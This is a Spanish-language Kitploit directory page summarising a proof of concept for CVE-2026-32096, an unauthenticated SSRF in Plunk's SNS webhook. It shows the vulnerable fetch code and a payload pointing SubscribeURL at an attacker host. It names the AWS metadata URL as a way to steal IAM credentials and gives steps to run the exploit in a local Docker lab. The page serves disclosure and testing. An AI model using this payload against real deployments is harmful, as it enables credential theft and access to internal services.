Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-32096 — Prueba de concepto de explotación para una vulnerabilidad SSRF en el webhook SNS de Plunk, que demuestra la falsificación de solicitudes del lado del servidor sin autenticación mediante un SubscribeURL no validado. | Kitploit
Herramientas/GitHubGitHub/andrebhu/cve-2026-32096
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Prueba de concepto de explotación para una vulnerabilidad SSRF en el webhook SNS de Plunk, que demuestra la falsificación de solicitudes del lado del servidor sin autenticación mediante un SubscribeURL no validado.

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-32096

SSRF mediante SubscriptionConfirmation de AWS SNS sin validar en useplunk/plunk

Resumen

El endpoint de la API de Plunk POST /webhooks/sns obtiene un SubscribeURL proporcionado por el atacante sin verificar la firma criptográfica de AWS SNS. Un atacante no autenticado puede forzar al servidor a realizar solicitudes HTTP salientes arbitrarias (SSRF).

GravedadCrítica — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: Server-Side Request Forgery
Archivo afectadoapps/api/src/controllers/Webhooks.ts
Autenticación requeridaNinguna

Código vulnerable

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — sin validación de firma
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

El payload mínimo consta de solo dos campos:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

Impacto

  • AWS EC2/ECS: Robo de credenciales IAM mediante http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Servicios internos: Acceso a bases de datos, Redis, API de Kubernetes u otros servicios no expuestos a internet
  • Escaneo de puertos: Enumeración de puertos internos mediante respuestas basadas en tiempos y errores

Reproducción

Requisitos previos

  • Docker y Docker Compose
  • Python 3

Pasos

  1. Inicie el entorno de prueba de Plunk:

    root@kitploit:~
    docker compose up -d
    
  2. Inicie el listener de callback SSRF:

    root@kitploit:~
    python3 listener.py
    
  3. Ejecute el exploit:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. Observe el callback recibido en la salida de listener.py, confirmando que el servidor obtuvo la URL controlada por el atacante.

Archivos

ArchivoDescripción
exploit.shScript de exploit de extremo a extremo: envía un payload SNS falsificado al endpoint vulnerable
listener.pyListener de callback SSRF: captura y registra las solicitudes entrantes del servidor Plunk
docker-compose.ymlEntorno mínimo de Docker Compose (Postgres, Redis, Plunk) para reproducción local

Referencias

  • AWS SNS: Verifying the signatures of Amazon SNS messages
  • OWASP SSRF Prevention Cheat Sheet
Descargar herramienta